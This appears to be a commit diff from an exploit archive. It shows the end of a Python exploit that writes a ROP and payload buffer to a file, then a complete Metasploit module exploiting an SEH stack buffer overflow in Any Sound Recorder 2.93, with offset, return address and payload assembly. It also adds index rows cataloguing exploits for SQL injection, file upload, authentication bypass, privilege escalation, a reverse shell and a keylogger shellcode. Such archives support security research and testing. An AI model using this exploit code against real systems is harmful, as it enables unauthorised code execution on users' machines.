poc = pad + rop + nop + boom + end
file = open("boom.txt", "w")
file.write(poc)
file.close
print "<3"

72
exploits/windows/local/45744.rb Executable file
View file

@ -0,0 +1,72 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Any Sound Recorder 2.93 Buffer Overflow (SEH)',
'Description' => %q{
This module exploits a stack based buffer overflow in Any Sound Recorder 2.93, when
with the name "hack.txt". Copy the content of the "hack.txt",Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register"
},
'License' => MSF_LICENSE,
'Author' =>
[
'Abdullah Alıç', # Original discovery
'd3ckx1 d3ck(at)qq.com', # MSF module
],
'References' =>
[
[ 'OSVDB', '' ],
[ 'EBD', '45627' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'Space' => 10000
},
'Targets' =>
[
[ 'Any Sound Recorder 2.93',
{
'Ret' => 0x72d12f35, # 0x72d12f35 : P/P/R FROM msacm32.drv form winxp sp3
'Offset' => 900
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Oct 25 2018',
'DefaultTarget' => 0))
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt']),], self.class)
end
def exploit
buf = "\x90"*(target['Offset'])
buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload)
buf << [target.ret] .pack('V') # seh
buf << make_nops(10)
buf << payload.encoded
buf << "\x90" * 200
file_create(buf)
handler
end
end

20
files_exploits.csv
View file

@ -6165,6 +6165,9 @@ id,file,description,date,author,type,platform,port
45715,exploits/linux/dos/45715.txt,"systemd - chown_one() can Dereference Symlinks",2018-10-29,"Google Security Research",dos,linux,
45716,exploits/windows/dos/45716.txt,"ASRock Drivers - Privilege Escalation",2018-10-29,SecureAuth,dos,windows,
45732,exploits/windows/dos/45732.txt,"Modbus Slave 7.0.0 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows,
45746,exploits/hardware/dos/45746.php,"ZyXEL VMG3312-B10B < 1.00(AAPP.7) - Credential Disclosure",2018-10-30,"numan türle",dos,hardware,21
45749,exploits/windows/dos/45749.py,"QNAP NetBak Replicator 4.5.6.0607 - Denial of Service (PoC)",2018-10-30,"Yair Rodríguez Aparicio",dos,windows,
45750,exploits/linux/dos/45750.txt,"SIPp 3.3.990 - Local Buffer Overflow (PoC)",2018-10-30,"Nawaf Alkeraithe",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10063,6 +10066,9 @@ id,file,description,date,author,type,platform,port
45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,
45709,exploits/windows_x86-64/local/45709.vb,"School Equipment Monitoring System 1.0 - 'login' SQL Injection",2018-10-29,"Ihsan Sencan",local,windows_x86-64,
45710,exploits/windows_x86/local/45710.pl,"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)",2018-10-29,"Kağan Çapar",local,windows_x86,
45738,exploits/windows/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows,
45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd,
45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16907,6 +16913,7 @@ id,file,description,date,author,type,platform,port
45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,25
45695,exploits/windows/remote/45695.rb,"WebExec - Authenticated User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,
45712,exploits/linux/remote/45712.py,"Paramiko 2.4.1 - Authentication Bypass",2018-10-29,"Adam Brown",remote,linux,
45748,exploits/multiple/remote/45748.py,"Nutanix AOS & Prism < 5.5.5 (LTS) / < 5.8.1 (STS) - SFTP Authentication Bypass",2018-10-30,"Adam Brown",remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40247,3 +40254,16 @@ id,file,description,date,author,type,platform,port
45733,exploits/php/webapps/45733.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection (2)",2018-10-29,"Ihsan Sencan",webapps,php,80
45734,exploits/php/webapps/45734.txt,"SaltOS Erp Crm 3.1 r8126 - Database File Download",2018-10-29,"Ihsan Sencan",webapps,php,80
45735,exploits/php/webapps/45735.txt,"K-iwi Framework 1775 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
45737,exploits/php/webapps/45737.txt,"Electricks eCommerce 1.0 - 'prodid' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
45739,exploits/php/webapps/45739.txt,"phptpoint Pharmacy Management System 1.0 - 'username' SQL Injection",2018-10-30,"Boumediene KADDOUR",webapps,php,80
45740,exploits/php/webapps/45740.txt,"Webiness Inventory 2.9 - Arbitrary File Upload",2018-10-30,"Boumediene KADDOUR",webapps,php,80
45741,exploits/hardware/webapps/45741.txt,"NETGEAR WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80
45747,exploits/php/webapps/45747.txt,"MyBB Downloads 2.0.3 - SQL Injection",2018-10-30,"Lucian Ioan Nitescu",webapps,php,80
45751,exploits/php/webapps/45751.txt,"Expense Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
45752,exploits/php/webapps/45752.txt,"University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)",2018-10-30,"Ihsan Sencan",webapps,php,80
45753,exploits/php/webapps/45753.txt,"Notes Manager 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
45754,exploits/php/webapps/45754.txt,"Instagram Clone 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
45755,exploits/jsp/webapps/45755.txt,"Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal",2018-10-30,"Rafael Pedrero",webapps,jsp,80
45756,exploits/php/webapps/45756.txt,"Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
45757,exploits/php/webapps/45757.txt,"CI User Login and Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -921,3 +921,4 @@ id,file,description,date,author,type,platform
45538,shellcodes/linux_x86/45538.txt,"Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)",2018-10-08,"Kartik Durg",shellcode,linux_x86
45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips
45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86
45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64

1 id file description date author type platform
921 45538 shellcodes/linux_x86/45538.txt Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes) 2018-10-08 Kartik Durg shellcode linux_x86
922 45541 shellcodes/linux_mips/45541.c Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes) 2018-10-08 cq674350529 shellcode linux_mips
923 45669 shellcodes/linux_x86/45669.c Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes 2018-10-24 Goutham Madhwaraj shellcode linux_x86
924 45743 shellcodes/windows_x86-64/45743.c Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator) 2018-10-30 Roziul Hasan Khan Shifat shellcode windows_x86-64

1020
shellcodes/windows_x86-64/45743.c Normal file
View file

File diff suppressed because it is too large Load diff